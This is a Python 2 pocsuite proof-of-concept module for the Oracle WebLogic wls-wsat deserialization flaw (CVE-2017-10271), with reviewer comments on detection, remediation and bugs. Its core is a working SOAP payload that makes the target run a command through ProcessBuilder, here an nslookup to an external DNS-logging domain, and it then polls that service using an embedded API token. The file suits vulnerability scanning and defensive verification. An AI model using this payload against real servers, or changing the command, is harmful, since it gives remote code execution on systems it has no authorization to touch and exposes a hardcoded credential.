#!/usr/bin/env python
# coding: utf-8
import random
import string
import urlparse
import time
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.lib.core.data import logger
class TestPOC(POCBase):
    """pocsuite PoC for CVE-2017-10271 (WebLogic wls-wsat XMLDecoder deserialization).

    Verification is out-of-band: the target is asked to resolve a random
    hostname under a third-party DNS-logging domain (``test_uri``) and that
    service's record log is then polled (``verify_request``). A positive
    result therefore depends on the target having outbound DNS and on the
    external service being reachable from the scanner; a negative result is
    not evidence that the host is patched.

    Defender notes: the probe is a POST to ``/wls-wsat/CoordinatorPortType11``
    whose SOAP ``WorkContext`` header carries a ``java.beans.XMLDecoder``
    document instantiating ``java.lang.ProcessBuilder`` -- that pair of
    strings in a WorkContext header is a reliable detection signature for
    WAF/IDS rules and access-log review. Remediation is Oracle's fix for
    CVE-2017-10271 (see ``references``) or removing/blocking the wls-wsat
    component.

    NOTE(review): the module is Python 2 only (``urlparse``, ``xrange``,
    ``ex.message``); it does not run unchanged on Python 3.
    """
    vulID = '97009'
    version = '1'
    author = ''
    vulDate = '2017-10-23'
    createDate = '2017-12-22'
    updateDate = '2017-12-22'
    references = [
        'https://www.seebug.org/vuldb/ssvid-97009',
    ]
    name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'
    appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'
    appName = 'WebLogic'
    appVersion = ''
    vulType = 'Remote Command Execution'
    # Vendor/affected-version description (runtime string, left verbatim).
    desc = '''
Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。
Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。以下组版本受到影响:Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.1.0版本,12.2.1.2.0版本。
'''
    samples = []

    def verify_request(self, token, type, flag):
        """Poll the DNS-log service for ``flag`` and report whether it was seen.

        Args:
            token: API token of the logging service (sent in the query string).
            type: record type filter passed straight into the query string
                (the caller uses "dns"); the name shadows the builtin but is
                only interpolated here.
            flag: random marker the target was asked to resolve.

        Returns:
            True if ``flag`` appears in a 200 response within at most three
            polls, each preceded by a 1 s sleep; False otherwise. Exceptions
            from ``req.get`` are logged and count as a failed poll, never
            raised (except as noted below).
        """
        retVal = False
        counts = 3
        # The token is a credential embedded in source and sent over plain
        # HTTP in the URL: anyone with the file or a view of the wire can
        # reuse it, and it is tied to one specific account (see test_uri).
        url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format(token=token, type=type, flag=flag)
        while counts:
            try:
                time.sleep(1)
                resp = req.get(url)
                # Substring match over the whole body rather than a parsed
                # record: the 8-letter flag appearing anywhere in the JSON
                # counts as a hit.
                if resp and resp.status_code == 200 and flag in resp.content:
                    retVal = True
                    break
            except Exception as ex:
                # Deprecated ``warn`` alias (test_uri uses ``warning``).
                # ``ex.message`` exists only on Python 2; on Python 3 this line
                # raises AttributeError out of the method.
                logger.warn(ex.message)
            # Indentation reconstructed: both lines sit at loop level so a
            # 200 without the flag still consumes one of the three attempts.
            time.sleep(1)
            counts -= 1
        return retVal

    def test_uri(self, uri):
        """Send the probe to ``uri`` and return True only if the DNS beacon fires.

        Args:
            uri: "scheme://host:port" prefix; the wls-wsat path is appended.

        Returns:
            True when the server answers 500 *and* ``verify_request`` finds
            the random flag in the DNS log; False on any other status or on
            a request exception (logged, not raised).
        """
        # 8 random ASCII letters, unique per probe, so a stale log entry from
        # an earlier run cannot yield a false positive.  ``xrange``: Python 2.
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        headers = {
            'SOAPAction': "",
            'Content-Type': 'text/xml;charset=UTF-8'
        }
        path = '/wls-wsat/CoordinatorPortType11'
        url = urlparse.urljoin(uri, path)
        # SOAP WorkContext header holding an XMLDecoder document that builds
        # ProcessBuilder(["nslookup", "<flag>.dns.<oob-domain>"]) and calls
        # start(); the only intended observable effect is the outbound DNS
        # lookup.  The OOB domain below and the token passed further down are
        # fixed to one account, so results are only meaningful to its holder.
        postdata = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="2">
<void index="0">
<string>nslookup</string>
</void>
<void index="1">
<string>{0}.dns.j3170ioc.ceye.io</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
""".format(flag)
        try:
            resp = req.post(url, data=postdata, headers=headers)
            # A 500 on its own is not proof (an unrelated SOAP fault also
            # answers 500); the DNS callback is the actual oracle.
            if resp.status_code == 500 and self.verify_request(token="5df9bef9ed0d27df6f8csc1452b99b5b2p", type="dns", flag=flag):
                return True
        except Exception as ex:
            # ``ex.message``: Python 2 only (see verify_request).
            logger.warning(ex.message)
        return False

    def _verify(self):
        """Probe the URL's own port and the default 7001; return a pocsuite Output.

        Returns:
            ``parse_output(result)`` where ``result['VerifyInfo']['URL']`` is
            the first "scheme://host:port" for which ``test_uri`` returned
            True, or an empty dict if none did.
        """
        result = {}
        pr = urlparse.urlparse(self.url)
        ports = [7001]
        # If self.url carries no explicit port, pr.port is None and is still
        # inserted here, so the first probe goes to "scheme://host:None".
        if pr.port not in ports:
            ports.insert(0, pr.port)
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            if self.test_uri(uri):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                break  # first confirmed port wins; remaining ports are skipped
        return self.parse_output(result)

    def _attack(self):
        """Attack mode is identical to verify mode: only the DNS beacon is sent."""
        return self._verify()

    def parse_output(self, result):
        """Wrap ``result`` in an Output: success if non-empty, otherwise fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
register(TestPOC)  # pocsuite entry point: registers this PoC class with the framework